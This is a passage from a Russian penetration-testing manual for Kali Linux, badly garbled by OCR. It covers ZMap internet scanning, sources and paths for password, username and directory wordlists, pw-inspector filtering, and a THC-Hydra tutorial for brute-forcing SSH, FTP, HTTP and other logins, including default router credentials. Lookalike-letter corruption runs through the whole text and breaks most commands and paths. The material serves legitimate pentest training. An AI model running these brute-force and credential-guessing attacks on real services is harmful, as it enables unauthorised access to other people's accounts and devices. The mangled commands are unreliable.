ІІ(Г\ЮТ ЕХІ5Т5 "/еІс/ітар/ЫаскІізІ.соп!") 

21 

!іІе(СОРУ м ${РРЮЮСТ_5ОиКСЕ_0ІВ}/соп1/ЫаскІіз1.сопГ ОЕБТІМАТІОМ 
"${СОІ\ІРІС_ОЕ5ТІІ\ІАТЮІ\І}/ЫаскІіз1.сопГ) 

3| 

епсН!() 

4| 


51 

іР(І\ІОТ ЕХІ5Т5 "/еіс/ітар/гтар.соп!") 

6| 

!іІе(СОРУ м ${РРЮЮСТ_50иКСЕ_01В}/соп!/2тар.сопГ ОЕБТІНАТЮЫ 
"${СОНРІС_ОЕ5ТІНАТІОН}/2тар.сопГ) 

71 

епсІІІО 


Чтобы заработало я сделал так: 


1| 

і!(І\ІОТ ЕХІ5Т5 "/еІс/ітар/ЫаскІізІ.соп!") 

2 1 

!іІе(СОРУ ",/сопІ/ЫаскІізІ.сопГ ОЕБТІМАТЮИ "${СОМРІС_ОЕБТІНАТЮМ}/ЫаскІІ5!.сопГ) 

3| 

епсІі!() 

4| 


5 1 

ІІ(І\ЮТ ЕХІ5Т5 "/еіс/ітар/ітар.соп!") 

6| 

ТіІе(СОРУ "./сопІ/гтар.сопГ ОЕБТІМАТІОІЧ "${СОНРІ6_ОЕ5ТІМАТІОМ}/2тар.сопГ) 

71 

епсЩ) 


Т.е. понятно, что по какой-то причине не была задана переменная 
${РКО.ІЕСТ_5ОІІКСЕ_0ІК}, но мне было не особо интересно разбираться, почему так 
случилось: для меня главное — чтобы работало. Кто знает — напишите в 
комментариях. 


Использование 2Мар 


У меня 2Мар не работала без прав суперпользователя, если у вас при запуске 
программы ошибка: 


1 


.ІиІ 08 17:02:45.814 [РАТАЦ гесѵ: соиіс) по! ореп ёеѵісе еіКО: еТЬО: Ѵои сІопЧ Наѵе 
регтіззіоп !о саріиге оп ТЬаТ сіеѵісе (зоске!: Орегаііоп по! регті!!есІ) 


То запускаяте её от рута. 


Следующая команда просканирует 10000 рандомных адресов на порту 80 при 
максимальной загрузке сети 10 мегабит в секунду: 


1 


ітар -Ьапс)\л/ісІ!Н=10М -!аг§е!-рог!=80 --тах-!аг§е!з=10000 -ои!ри!-!іІе=гезиІІ5.С5ѵ 


А это абсолютно то же самое, только в сокращённой записи: 


1 


гтар -В ЮМ -р 80 -п 10000 -о гезиііз.сзѵ 


Понятно, что 2Мар может быть использована для сканирования заданных подсетей или 
блоков СЮК . Например, для сканирования только 10.0.0.0/8 и 192.168.0.0/16 на порте 
80 запустите: 


1 


гтар -р 80 -о гезиііз.сзѵ 10.0.0.0/8 192.168.0.0/16 


Документация и дополнительные примеры по 2Мар здесь . 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Часть 8. Атаки на пароли. Брутфорсинг 

Глава 57. Списки слов для атаки по словарю: пароли, имена 
пользователей, каталоги 


Далеко не всё программное обеспечение содержит эксплуатируемые уязвимости (как 
этого хотелось бы некоторым). Но цепь, как известно, рвётся на самом слабом звене. И 
нам не важно, насколько сильны остальные звенья, если мы найдём слабое. 

Очень часто слабым звеном является человек. Именно поэтому достаточно популярен 
социальный инженеринг. Ещё один вид атаки, который я бы также отнёс к 
человеческому фактору, это атака на слабые пароли. Как стало известно из недавних 
новостей, даже некоторые профессионалы в безопасности компьютерной 
информации, самые настоящие хакеры, иногда используют слабые пароли. 

Атаки на пароль можно разделить на две большие группы: атаку на хеш и 
попытку подобрать пароль для аутентификации. Не будем останавливаться подробно 
на их характеристиках, для данной статьи это несущественно. Поскольку в обеих 
группах возможна атака по словарю. 


Вот мы и подошли к самому главному — где взять словари. Под разные задачи 
нужны разные словари: 

• если мы брутфорсим вход в удалённую службу, то нам нужны не очень большие 
словари, но с наиболее часто встречающимися именами пользователей и 
паролями. Это связано с тем, что большинство сетевых сервисов имеют 
настроенную защиту от брутфорсинга. Т.е. чтобы наш ІР не был заблокирован 
автоматическим скриптом, мы должны делать большой интервал между 
попытками. На это потребуется много времени, поэтому есть смысл это затевать 
только с самыми популярными наборами слов; 

• брутфорсинг пароля ѴѴі-Рі сети (в перехваченном рукопожатии), то нам по 
прежнему нужен качественный словарь с популярными паролями, но чем 
больше словарь, тем лучше, особенно если у вас среднее или сильное железо; 

• брутфорсинг адресов админок, субдоменов, директорий, файлов — нужен 
специализированный словарь, с наиболее часто встречающимися адресами. 


Думаю, смысл понятен: нельзя иметь один самый лучший словарь на все случаи жизни. 
Таких словарей должно быть несколько. 


Если кто-то забыл, считать количество строк (соответственно, записей) можно так: 


1 


ѵѵс -I имя_файла 


Там, где указываются пути до файлов в локальной системе, — это для Каіі Ыпих. Если у 
вас другой дистрибутив, вполне возможно, что у вас этих файлов нет. 


Словари имён пользователей и паролей для брутфорсинга авторизации в 
сетевых службах 

Этими службами могут быть 55Н, РТР, базовая авторизация, НТТР авторизация на сайте, 
почте и т. д. 

Для этого обычно используются программы ТНС-НусІга, Месіиза, РаТаТог, ВгиІеХ . 
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Из всех этих программ со словарями поставляется только ВшІеХ (поправьте, если 
ошибаюсь). 

Она использует словари с сайта НіІрУ/сІомпІоасІ.орепѵѵаІІ.пеі/риЬ/ѵѵогсІІізіз/ . Мы 
можем перейти на этот сайт, или одолжить словари прямо у самой этой программы 
для использования, например, с РаТаТог. 


Скачать файл со списком имён: 


1 


\л/§еТ ЬіТр5://га\/ѵ.§і{ЬиЬи5егсоп{епСсот/1МЗ/Вги1:еХ/та${ег/патеІІ5І:.1:х1: 


Скачать файл со списком паролей: 


1 


\л/§еТ ШрзУ/гаѵѵ.ёііЬиЬизегсопІіепСсот/ІМЗ/ВгиІіеХ/тазІег/раззѵѵогсі.ІзІ: 


А этот файл содержит перечень распространённых пользователей Ыпих: 


1 


\л/§е1: ЬирзУ/гаѵѵ.ёііЬиЬизегсопІепСсот/ІМЗ/ВгиІіеХ/тазІег/зітрІе-изегз.ІхІ: 


Этот список слов от птар, не очень большой, подойдёт для перебора популярных 
паролей: 


1 


/изг/зітаге/птар/пзеііь/сіаііа/раззѵѵогсіз.ізі: 


Ещё парочка словарей от Меіазріоіі:: 


1| 

/изг/зітаге/ѵѵогсііізіз/теіазріоіі-фг/соттоп-гооіз.іхі: 

21 

/изг/зііаге/ѵѵогсііізіз/теіазріоіі-фг/раззѵѵогсі.ізі: 


Названия у них вполне говорящие. 


Словари для перебора субдоменов, каталогов, файлов и поиска 
админок. 

Пару словарей можно одолжить у того же ВгиІеХ: 


1| 

\л/§еТ Ьі{рз://га\/ѵ.§ііЬиЬи5егсоп{епСсот/1МЗ/Вги1:еХ/та5І:ег/сІігЬи5І:ег.1:х1: 

21 

\л/§еТ ЬМрз://гаѵѵ.§ііЬиЬи5егсоп1епСсот/1МЗ/Вги1:еХ/та5І:ег/с]ігЬи5І:ег-ех1:.1:х1: 


(второй словарь — это расширения файлов) 


Использование в названии файла сіігЬ наводит нас на мыль о программе РІВВ . С этой 
программой поставляется множество словарей. 

Они расположены в каталогах: 


1| 

/и з г/з Іі а ге/сі і г Ь/ѵѵо гсі 1 і 5І5 

21 

/изг/зІіаге/сІігЬизІег/ѵѵогсІІІзІз 
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Вот дерево этих каталогов: 


1| 

гоо1:@\Л/еЬ\Л/аге:~# Ігее /изг/зЬаге/ѵѵогсІІ ібТз/сіігЬ* 

21 

/изг/зИаге/ѵѵогсПіБТз/сІігЬ 

3| 

| — Ыб.М 

4| 

| — саіаіа.іхі 

51 

| — соттоп.ЪД 

6| 

| — еизкега.ЪД 

71 

|— ех1еп5Іоп5_соттоп.1:х1: 

81 

|— іпсіехез.іхі: 

91 

| — ти1а1:іоп5_соттоп.1:х1: 

10 


| — оіііегз 

11 


| | — Ье$1:1050.1:х1: 

12 


| | —Ьезіі 10.1x1 

13 


| | — Ье5І:15.1х1: 

14 


1 — патез.М 

15 


| — зтаІІ .ТхТ 

16 


| — зрапізіі.іхі: 

17 


| -5ІГѲ55 

18 


| — аІрЬапит_сазе_ехІга.1:х1: 

19 


| — аІрЬапит_сазе.1:х1: 

20 


| — сНаг.ТхТ 

21 


| — сІоЫе_игі_Нех.1:х1: 

22 


| | — ІезІ_ех1:.1:х1: 

23 


| — ипісосіе.іхі: 

24 


1 — игі_Ьех.Іх1: 

25 


1 — ѴІІІП5 

26 


| — арасНе.М 

27 


| — ахіз.ТхІ: 

28 


| — с§і$.1:х1: 

29 


| — соІсИгізіоп.ІхІ: 

30 


| — сіотіпо.іхі: 

31 


| — 1а1лл/іге_ра§епате5.1:х1: 

32 


| —ТаТѵѵіге.ТхІ: 

33 


| — ТгопТраёе.ТхТ 

34 


| — НрзтЬ.М 
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35 


|— Нурегіоп.іхі 

36 


|— ііз.іхі 

37 


|— іріапеі.іхі 

38 


|— іЬозз.Іх! 

39 


|— іегзеу.іхі 

40 


|— ігип.іхі 

41 


| — пеіѵѵаге.іхі 

42 


| — огасіе.іхі 

43 


| — го г.1x1 

44 


| — за р.1x1 

45 


| — зИагероіпІ.Іх! 

46 


| — зипа5.1х1 

47 


| — Іезіз.іхі 

48 


| —Іотсаі.іхі 

49 


| —ѵі§пе11е.1х! 

50 


| —\л/еЫо§іс.1х! 

51 


1 —ѵѵеЬзр беге. 1x1 

52 


/изг/зИаге/ѵѵогсІІізІз/сІігЬизІег 

53 


| — арасбе-изег-епит-1.0.1x1 

54 


| — арасІіе-изег-епит-2.0.1x1 

55 


| — сіігесІогіез.іЬгоІигі 

56 


| — сіігесіогу-іізі-і.0.1x1 

57 


| — сі ігес1огу-Ііз1-2.3-тесІіит .1x1 

58 


| — сПгес1огу-Ііз1-2.3-зтаІІ.1х1 

59 


| — е)ігес1огу-Іі5І-Іо\л/егсазе-2.3-тесііит.1х1 

60 


1 — сНгес1огу-Пз1-1о\л/егса5е-2.3-зта11.1х1 

61 



62 


3 сіігесіогіез, 54 ІІІез 


Пожалуй, описывать их все тяжело, возможно, описание каждому файлу будет дано в 


отдельной статье посвящённой программе йІКВ. 


Словари для взлома \Л/і-Рі 


Словарь госкуои является универсальным и довольно большим. Очень удобно его 
применять для атаки по словарю при взломе рукопожатия, перехваченного по ѴѴі-РІ . 

Он уже имеется в Каіі, размещён здесь: 


1 


/и5г/зНаге/ѵѵогсіІІ5І5/госкуои.1х1.§2 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Ещё один маленький файл: 


/изг/зІпаге/ѵѵогсІІізТз/Тегп-ѵѵіі'і 


Специально для ѴѴі-Рі, возможно, кому-то пригодится. 

Словари для перебора баз данных (таблиц, полей и прочего) 

Уже есть в Каіі, лежит здесь: 


/изг/зНаге/зцІтар/ЪД/ѵѵогсІІізСІхІ: 


Списки слов от Меіазріоіі 

Про два словаря от Меіазріоіі: мы уже упоминали. 

Остальные словари носят вполне говорящие названия, посмотрите на это дерево: 


1| 

гооіеЭѴѴеЬѴѴаге:^# Ігее /изг/зііаге/ѵѵогсііізіз/теіазріоіі: 

21 

/иБг/зИаге/ѵѵогсП ізТБ/теІіазрІоіІ: 

3| 

| — аѵ-ирсіаіе-игіз.іхі: 

4| 

| — ЬигпеИ:_1:ор_1024.1:х1: 

51 

| — Ьигпе11:_1:ор_500.1:х1: 

6| 

| — ст5400пе!_сІе1 : аиІ1:_іі5егра5$.1:х1: 

71 

| — сІЬ2_сІе1 : аиІ1:_ра55.1:х1: 

81 

| — сІЬг^еРаиІ^изеграББ.ІхІ: 

91 

| — сіьг^еіаиі^изег.іхі: 

10 


| — ёеіаиіі-разз^ог-зегѵісез-ііпііазіі.ііхі: 

11 


| — (1е1аиІ1_и5егра55_1ог_5егѵісе5_ипІпа5І'і.1:х1: 

12 


| — сІеІаиІІ-изегз^оГ-ЗегѵісеЗ-ипІіаБІіТхІ: 

13 


| — сПіпк_ТеІпе1:_ЬасксІоог_и5егра55.1:х1: 

14 


| — Іісі_огасІе_ра55ѵѵогс)5.с5ѵ 

15 


| — Ы:1:р_сІеТаиИ:_ра55.1:х1: 

16 


| — Ыір^еРаиІ^изеграБЗ.ІхІ: 

17 


| — ІШр-СІеРаиІІ-изегз.ІхІ: 

18 


| — Ні:1:р_о\л/а_соттоп.1:х1: 

19 


| — іс)гас_сІеТаиІ1:_ра55.1:х1: 

20 


| — іс)гас_сІеТаиІ1:_и5ег.1:х1: 

21 


| — ірті_ра55\л/огсІ5.1:х1: 

22 


| — Ірті_и5ег5.1:х1: 

23 


| —іоотіа.іхі: 

24 


| — кеуЬоагсІ-раІІегпз.ІхІ: 

25 


| — таІісіои5_и гІз.ТхТ 
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26 


|— тиШ_ѵепсІог_сс1ѵ_сІѵг_ра55.1:х1: 

27 


|— тиШ_ѵеп(!ог_сс1ѵ_(!ѵг_и5ег5.1:х1: 

28 


|— патеіізі.іхі: 

29 


| — 0гасІе_сІеТаиИ:_Иа5Іэе5.1:х1: 

30 


| — огасІе_(МаиІ1:_ра55\/ѵогс]5.с5ѵ 

31 


| — огасІе_сІе1 : аи ІТ_и5егра55.1:х1: 

32 


| — ро5І:ёге5_сІеТаи І1:_ра55.1:х1: 

33 


| — ро5І:§ге5_сІе1 : аиІ1:_и$егра55.1:х1: 

34 


| — ро5І:ёге5_сІеТаи І1:_и5ег.1:х1: 

35 


| — гооТ_и5егра55.1:х1: 

36 


| — грс_пате5.1:х1: 

37 


| — г5егѵісе5_1гот_и5ег5.1:х1: 

38 


| — 5ар_соттоп.1:х1: 

39 


| — за р_сІе^а и ІТ.Тхі: 

40 


| — 5ар_іст_ра1:1і5.1:х1: 

41 


| — зепзШѵе^іІез.ІхІ: 

42 


| — зепзі1:іѵе_ТіІе5_ѵѵіп.1:х1: 

43 


| — зісі.Тхі: 

44 


| — 5птр_сІе1 : аиІ1:_ра55.1:х1: 

45 


| —іГСр.іхІ 

46 


| — 1отса1:_т§г_сІе1 : аиІ1:_ра55.1:х1: 

47 


| — 1отса1_т§г_(МаиИ_и5егра55.1:х1: 

48 


| — 1отса1^гі§г_сІе1 : аиІ1:_и5ег5.1:х1: 

49 


| — ипіх_ра$5ѵѵогсІ5.1:х1: 

50 


| — ипіх_изегз.1:х1: 

51 


| — ѵпс_ра55ѵѵогсІ5.1:х1: 

52 


| — ѵхѵѵогкз_соІІісІе_20.1:х1: 

53 


1 — ѵхѵѵогк5_соттоп_20.1:х1: 

54 



55 


0 сІігесТогіез, 51 Тііез 


Все эти файлы размещены в директории: 


1 


/изг/зНаге/ѵѵогсІІізІіз/теІіазрІоіІ: 


Словари дефолтных учётных записей для роутеров 

Заводские (стандартные) имена пользователей и паролей встречаются на роутерах 
очень часто. 
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Программа Коиіег 5сап ѵ2.52 Ьу 51:а5'М настолько мне нравится, что я постоянно из неё 
что-то тырю. До этого брал идеи и алгоритмы эксплуатирования уязвимых роутеров. 
Теперь вот файлы со словарями. В программе имеется два файла аиІІ'Нэазіс.М и 
аиТЬ_с) і^езТ.ІіхІ; (для базовой аутентификации и НИР аутентификации). Файлы почти 
идентичны по содержимому и, скорее всего, списки нужно переводить в понятный для 
Ыпих программ формат. Но, тем не менее, я их очень ценю — т. к. они основаны на 
практике. 

Скачать их можете по этой ссылке . 

Ещё есть много сайтов, где можно найти заводские пароли для роутеров. Например, 
можно воспользоваться этим . А этот сайт позволяет легко парсить дефолтные пароли 
под разные устройства. 


Глава 58. Р\Л/-1п5рес1ог: отбираем пароли соответствующие 
критериям 


Надоело делать большие длинные инструкции по сложным программам. )) Сегодня 
совсем короткая инструкция. И совсем простая. 

После того, как мы раздобыли файлы со словарями (списки пользователей и паролей), 
то, прежде чем использовать, эти файлы крайне желательно почистить: удалив 
повторяющиеся записи, вы сэкономите время на перебор. Довольно часто мы знаем, 
что пароли, которые нам нужно брутфорсить, соответствуют определённым 
требованиям. Например, пароли для ѴѴі-Рі сетей не могут быть меньше 8 символов и 
больше 63. Многие сайты устанавливают минимальную длину пароля. 

Вычистив пароли, которые точно не могут быть правильными, мы увеличим свои 
шансы на удачный исход брутфорса. Или, хотя бы, сэкономим время и компьютерные 
ресурсы. 

РѴѴ-ІпзресІог читает пароли и выводит те из них, которые соответствуют требованиям. 


Синтаксис: 


1 


рѵѵ-іпзресіог [-І ФАЙЛ] [-о ФАЙЛ] [-т МИН] [-М МАКС] [-с НАБОР] -I -и -п -р -5 


1| 

Опции: 


21 

-і ФАЙЛ 

Файл, из которого считываются пароли (по умолчанию: стандартный 
ввод) 

3| 

-о ФАЙЛ 

Файл, в который будут записаны новые пароли (по умолчанию: 
стандартный вывод) 

4| 

-т МИН 

Минимальная длина новых паролей 

51 

-М МАКС 

Максимальная длина новых паролей 

6| 

-с НАБОР 

Как минимум в пароле обязательно должны быть эти символы (по 
умолчанию: всё приемлемо) 

71 

5е1:5: 


81 

-1 

Строчные буквы (а,Ь,с,сІ и т.д.) 
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9 1 

-и 

Заглавные буквы (А,В,С,Р и т.д.) 

10 1 

-п 

Цифры (1,2,3,4 и т.д.) 

11 1 

-Р 

Печатные символы (которые не -І/-п/-р, е.§. $,!,/,(,* и т.д.) 

12 1 

-5 

Специальные символы — все остальные кроме уже перечисленных 


Возвращаемый код — это количество найденных новых паролей, 0 — если пароли не 
найдены. Используйте аккуратно: проверяйте пароли, если возвращается 0, то 
отменяйте выбор паролей. 

Примеры использования: 


1| 

саТ бісііопагу.іхі | рѵѵ-іпзрес1:ог -т 6 -с 2 -п > раззІізТМ 

2 1 

саТ госкуои.М | 50гТ | ипіц | рѵѵ-іпзресіог -т 8 -М 63 > пеѵѵгоскуои.іхі: 


Глава 59. ТНС-НусІга: очень быстрый взломщик сетевого входа в 
систему (часть первая) 


Программа Нубга поддерживает огромное количество служб, благодаря своей 
быстроте и надёжности она завоевала заслуженную признательность среди тестеров 
на проникновение. Будучи очень мощной и гибкой, программу Нубга нельзя отнести к 
простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось 
оседлать Нубга, я рекомендую вам посмотреть на программу ВгіПеХ. Она значительно 
автоматизирует процесс подбора, более того, она использует ту же самую Нубга, но 
сама вводит необходимые ключи и даже не нужно искать файлы с именами и 
паролями, поскольку они поставляются вместе с программой. Если я вас 
заинтересовал, то рекомендую статью « ВгиТеХ: программа для автоматического 
брутфорса всех служб ». 

Этот инструмент — ТНС-Нубга — предназначен только для законных целей. 

Программа прекрасно компилируется и работает на Ыпих, \Л/іпбо\л/5/Су§\л/іп, 
Зоіагіз, РгееВ50/0репВ50, ЦЫХ (ВІаскЬеггу 10) и 05Х. Лучше всех пользователям Каіі 
Ыпих - у них программа уже установлена. 

В настоящее время поддерживаются следующие протоколы: Азіегізк, АРР, Сізсо ААА, 
Сізсо аиіН, Сізсо епаЫе, СѴ5, РігеЬігб, РТР, НТТР-РОВМ-СЕТ, НТТР-Р0ВМ-Р05Т, НТТР-СЕТ, 
НТТР-НЕАО, НТТР-РВОХѴ, НТТР5-РОВМ-СЕТ, НТТР5-Р0ВМ-Р05Т, НТТР5-СЕТ, НТТР5-НЕА0, 
НТТР-Ргоху, іса, ІМАР, ІВС, ШАР, М5-5Щ, МѴ5Щ, ІЧСР, ЫІМТР, Огасіе Ызіепег, Огасіе 5Ю, 
Огасіе, РС-АпуѵѵНеге, РСИР5, РОРЗ, Р05ТСВЕ5, ВОР, Вехес, ВІо§іп, ВзН, 5АР/ВЗ, 5ІР, 5МВ, 
5МТР, 5МТР Епит, 5ИМР ѵ1+ѵ2+ѵЗ, 50СК55, 55Н (ѵі и ѵ2), 55НКЕѴ, ЗиЬѵегзіоп, Театзреак 
(Т52), Теіпеі, ѴМѵѵаге-АиіН, ѴЫС и ХМРР. 


Нут. е. правда — много. 


Синтаксис Нусіга: 


і 


Нубга [[[-I І_ОеіМ|-І_РІІ_Е] [-р РА55І-Р РНЕ]] | [-С РНЕ]] [-е пзг] [-о РНЕ] [-ІТА5К5] [-М РНЕ 
[-ТТА5К5]] [-\л/ ТІМЕ] [-ѴѴ ТІМЕ] [-Ц [-5 РОВТ] [-х МІМ:МАХ:СНАВ5ЕТ] [-5иѵѴб46] 

[зе гѵі се://зе гѵе г [: РО ВТ] [/О РТ] ] 
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Прибавилось ли понимания после увиденного синтаксиса? )) Не переживайте, сейчас 
рассмотрим опции ТНС-НусІга, а потом углубимся в понимание работы с этой 
программой. 

Опции Иусіга: 


1| 

-В 

Восстановить предыдущую 
прерванную/оборванную сессию 

21 

-5 

Выполнить 55Ь соединение 

3| 

-5 ПОРТ 

Если служба не на порту по умолчанию, то 
можно задать порт здесь 

4| 

-1 ЛОГИН 

Или -Ь ФАЙЛ с ЛОГИНАМИ (именами), или 
загрузить несколько логинов из ФАЙЛА 

51 

-р ПАРОЛЬ 

Или -Р ФАЙЛ с паролями для перебора, или 
загрузить несколько паролей из ФАЙЛА 

6| 

-х МИН:МАК:НАБОР_СИМВОЛОВ 

Генерация паролей для брутфорса, наберите "-х 
-Н" для помощи 

71 

-е П5г 

"п" — пробовать с пустым паролем, "з" — логин 
в качестве пароля и/или "г" — реверс учётных 
данных 

81 

-и 

Зацикливаться на пользователя, а не на парлях 
(эффективно! подразумевается с 
использованием опции -х) 

91 

-С ФАЙЛ 

Формат где "логин:пароль" разделены 
двоеточиями, вместо опции -І./-Р 

101 

-М ФАЙЛ 

Список серверов для атак, одна запись на 
строку, после двоеточия можно задать порт 

111 

-о ФАЙЛ 

Записывать найденные пары логин/пароль в 
ФАЙЛ вместо стандартного вывода 

121 

-*/-Р 

Выйти, когда пара логин/пароль подобрана (-М: 
-Г для хоста, -Р глобально) 

13 

-1 ЗАДАЧИ 

Количество запущенных параллельно ЗАДАЧ 
(на хост, по умолчанию: 16) 

141 

-ѵѵ / -ѴѴ ВРЕМЯ 

Время ожидания ответов (32 секунды) / между 
соединениями на поток 

151 

-4/-6 

Предпочитать ІРѵ4 (по умолчанию) или ІРѵб 
адреса 

161 

-ѵ / -V / -сі 

Вербальный режим / показывать логин+пароль 
для каждой попытки / режим отладки 

171 

-ч 

Не печатать сообщения об ошибках соединения 

181 

-11 

Подробные сведения об использовании модуля 

191 

зегѵег 

Цель: ОИБ, ІР или 192.168.0.0/24 (эта ИЛИ опция 
-М) 

201 

зегѵісе 

Служба для взлома (смотрите список 
поддерживаемых протоколов) 
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211 

ОРТ 

Некоторые модули 

служб поддерживают 



дополнительный ввод 
модулю) 

(-1) для справки по 


Как использовать Иусіга 



Пароли для Нусіга 

ТНС-НусІга поставляется без логинов/паролей. Нам нужно самим где-то их раздобыть. И 
вот здесь нам поможет недавняя статья « Списки слов для атаки по словарю: пароли, 
имена пользователей, каталоги ». Изучайте её, скачивайте свои пароли. 

Ещё файлы с дефолтными паролями позволяет генерировать утилита от Ьусіга — 
фІ4ЬусІга.$Н. Чтобы узнать, какие устройства есть в базе, зайдите сюда . 


Чтобы воспользоваться программой с!рІ4ИусІ га.зИ на Каіі Ыпих, нам сначала нужно её 
скачать (по какой-то причине авторы Каіі не включили её в стандартную установку): 


1| 

\л/§еТ Ьі:1:р5://га\/ѵ.§і{ЬиЬи5егсопЩпСсот/ѵапНаи$ег-1:ЬсДНс-ІіусІга/та$Щг/сІрІ4ЬусІга.5б 

Теперь создаём необходимые для работы программы файлы: 

1| 

Іюисіг /изг/ІосаІ/е1:с/сірІ4ТіусІга_ТиІІ.С5ѵ /изг/ІосаІ/еТс/сІ рІ4ИусІ га_ІосаІ.С5ѵ 

Запускаем первый раз: 

1| 

зН сІрІ4НусІга.5Іі геТгезРі 

Теперь можно сделать так: 

1| 

5И сІрІ4НусІга.5Іт аІІ 

Чтобы скачать дефолтные пароли для всех брендов. А можно задать 
бренд, например, меня очень интересуют популярные роутеры О-Ыпк, то я 

конкретный 

набираю: 

1| 

5И сІрІ4НусІга.5Іт сі-Ііпк 
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По идее, должен сгенерироваться файл с дефолтными паролями устройств 0-Ыпк, но 
этого не происходит из-за каких-то ошибок парсинга. Пусть нас это не огорчает, ведь 
ссылку на статью с паролями я уже дал. 

Графический интерфейс Нусіга 


Кстати, для пользователей Ыпих доступен графический интерфейс (СТК §иі), для его 
запуска наберите: 


1 


хНусІга 


Использование Нусіга в командной строке 


Для использования в командной строке синтаксис следующий: 


• Для атаки одной цели или сети, вы можете использовать новый стиль :// 


1 


Ііусіга [некоторые опции командной строки] ПРОТОКОЛ://ЦЕЛЬ:ПОРТ/ОПЦИИ 


• Старая старый синтаксис также поддерживается, а если вы хотите, то 
дополнительно можете задать цели из текстового файла, при этом вы *должны* 
использовать этот синтаксис: 


1 


Ііусіга [некоторые опции командной строки] [-5 порт] ЦЕЛЬ ПРОТОКОЛ ОПЦИИ 


Через опции командной строки вы определяете, какие логины и пароли перебирать, 
нужно ли использовать 55Ц во сколько потоков осуществлять атаку и т.д. 


ПРОТОКОЛ — это протокол, который вы хотите атаковать, например, Др, згтДр, ІіДр-§еІ 
или любой из доступных 


ЦЕЛЬ — это целевая машина, которую вы хотите атаковать 
ТАКОЕТ І5 {Не Тагмет уои \л/ап{ {о аДаск 


ОПЦИИ дополнительные значения, которые задаются для модуля ПРОТОКОЛ 

Первое — выберите вашу цель 

есть три способа задать цель для атаки: 

1. единичная цель в командной строке: просто введите ІР или 0145 адрес 

2. диапазон подсети в командной строке: 

3. список хостов в текстовом файле: один хост на строку (подробности ниже) 

Второе — выберите ваш протоколов 

Старайтесь избегать {еІпеЦ так как нельзя надёжно определить, соединение успешно 
или нет. Используйте сканер портов, чтобы увидеть, какие протоколы включены на 
целе. 


Третье — проверьте, имеет ли модуль дополнительные параметры: 
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Четвёртое — порт назначение 

Это необязательно! Если на удалённой машине используется порт по умолчанию для 
этой службы, то программа бубга сама знает, какие порты используется для 
ПРОТОКОЛОВ 

Если вы задали использовать 551. (опция "-5"), то по умолчанию будет использоваться 
обычный порт 551. 

Если вы используете нотацию то вы должны использовать квадратные скобки [ ], 
если вы хотите цель для атак определить адресами ІРѵб или СЮР ("192.168.0.0/24"): 


1| 

бубга [некоторые опции командной строки] ТТр://[192.168.0.0/24]/ 

21 

бубга [некоторые опции командной строки] -6 5т1:р://[2001:бЬ8::1]/Г\ІТІ-М 


Обратите внимание, что бубга делает все атаки только на ІРѵ4! 

Если вы хотите атаковать адреса ІРѵб вы должны добавить опцию "-б". Тогда все атаки 
будут на ІРѵб. 

Если вы хотите задать цели через текстовый файл, вы не можете использовать 
обозначение ://, используйте старый стиль и задайте протокол (и опции модуля): 


1| 

бубга [некоторые опции командной строки] -М ТагёеТз.ТхТ ТТр 

Вы также можете указать порт для каждой цели, добавив ":<порт>" после каждой 
записи цели в файле, например: 

1| 

Іюо.Ьаг.сот 

21 

1:аг§е1:.сот:21 

3| 

ипи$иаІ.рог1:.сот:2121 

4| 

бе^аиІЕизеб. беге, сот 

51 

127.0.0.1 

6| 

127.0.0.1:2121 


Обратите внимание, если вы хотите присоединить цели ІРѵб, вы должны указать опцию 
-б и должны поместить адреса ІРѵб в квадратные скобки в файле (!) примерно так: 


1| 

Іюо.Ьаг.сот 

21 

іаг§е1:.сот:21 

3| 

[!е80::1%е1:б0] 

4| 

[2001::1] 

51 

[2002::2]:8080 

6| 

[2а01:24а: 133:0:00:123 ббіа] 


Логины и пароли Нусіга 

Есть много разных опций, как атаковать с логинами и паролями. 

Опциями -I для логина и -р для пароля, вы можете сказать бубга использовать только 
эти логин и/или пароль для попытки. 
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С -I. для логинов и -Р для паролей вы указываете текстовые файлы с записями, 
например: 


1| 

Нусіга -1 асітіп -р раззѵѵогсі ТТр://1осаПэо5Т/ 

21 

Нусіга -1. (МаиІіМодіпз.ЪсІ: -р Іезі: ТТр://ІосаІ Нобі:/ 

3| 

Нусіга -1 асітіп -Р соттоп_разз\л/огс15.1:х1: ТТр://ІосаІНо5І:/ 

4| 

Нусіга -1. Іо§іпз.1:х1: -Р раззѵѵогсіз.ЪсІ: ТТр://ІосаІН 05 Т/ 


Дополнительно вы также можете пробовать пароли, основанные на логины, это 
делается опцией "-е". 

Опция "-е" имеет три параметра: 

• з — пробовать логин как пароль 

• п — пробовать пустой пароль 

• г — перестановка в логине символов с зада на перёд и использование 
получившегося слова в качестве пароля 

К примеру, если вы хотите попробовать логин в качестве пароля и пустой пароль, то 
вам нужно в командной строке указать "-е зп". 

Для пароля кроме -р/-Р есть ещё пара режимов: 

Вы можете использовать текстовый файл, в котором логины и пароли разделены 
двоеточием, например: 


1| 

асітіпщаззѵѵогсі 

2 1 

ІезШезі: 

3| 

^оо:Ьаг 


Это популярный стиль записи листинга дефольтных значений аккаунта. В таком же 
виде генерирует файлы сІрІ4НусІга.5Н (генератор дефолтных логинов и паролей для 
Нусіга). 

Использовать такой текстовый файл нужно с опцией -С, обратите внимание, что в этом 
режиме нельзя использовать опции -І/-1_/-р/-Р (хотя -е пзг можно). 


Пример: 


1 


Иусіга -С (МаиН^ассоипІз.ЪсІ: ТТр://Іоса I Иозі:/ 


И наконец, есть режим брутфорса с опцией -х (её нельзя использовать с -р/-Р/-С): 

-х минимальная_длина:максимальная_длина:набор_символов 

Набор символов определяет 'а' для букв в нижнем регистре, 'А' — для букв в вернем 
регистре, '1' — для цифр, а для всего другого используйте их реальные символы. 

Примеры: 

• -х 1:3:а генерирует пароли длинной от 1 до 3 символов, состоящие только из 
букв в нижнем регистре 
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• -х 2:5:/ генерирует пароли длинной от 2 до 5 символов, содержание только 
слэши 


• -х 5:8:А1 генерирует пароли длинной от 5 до 8 символов, с большими буквами и 
цифрами 


Пример: 


1 


Ііусіга -I -х 3:3:а Лр://ІосаІбо$і/ 


Специальные опции для модулей 


Через третий параметр командной строки (ЦЕЛЬ СЛУЖБА ОПЦИИ) или после ключа -гл, 
вы можете передать модулю одну опцию. 

Многие модули используют их, а некоторые требуют их! 

Чтобы получить дополнительную информацию по опции модуля, наберите: 


1 


Ііусіга -II <модуль> 


Например: 


1 


Ііусіга -II ЫТр-розЫюгт 


Специальные опции могут быть переданы через параметр -т или третьей опцией в 
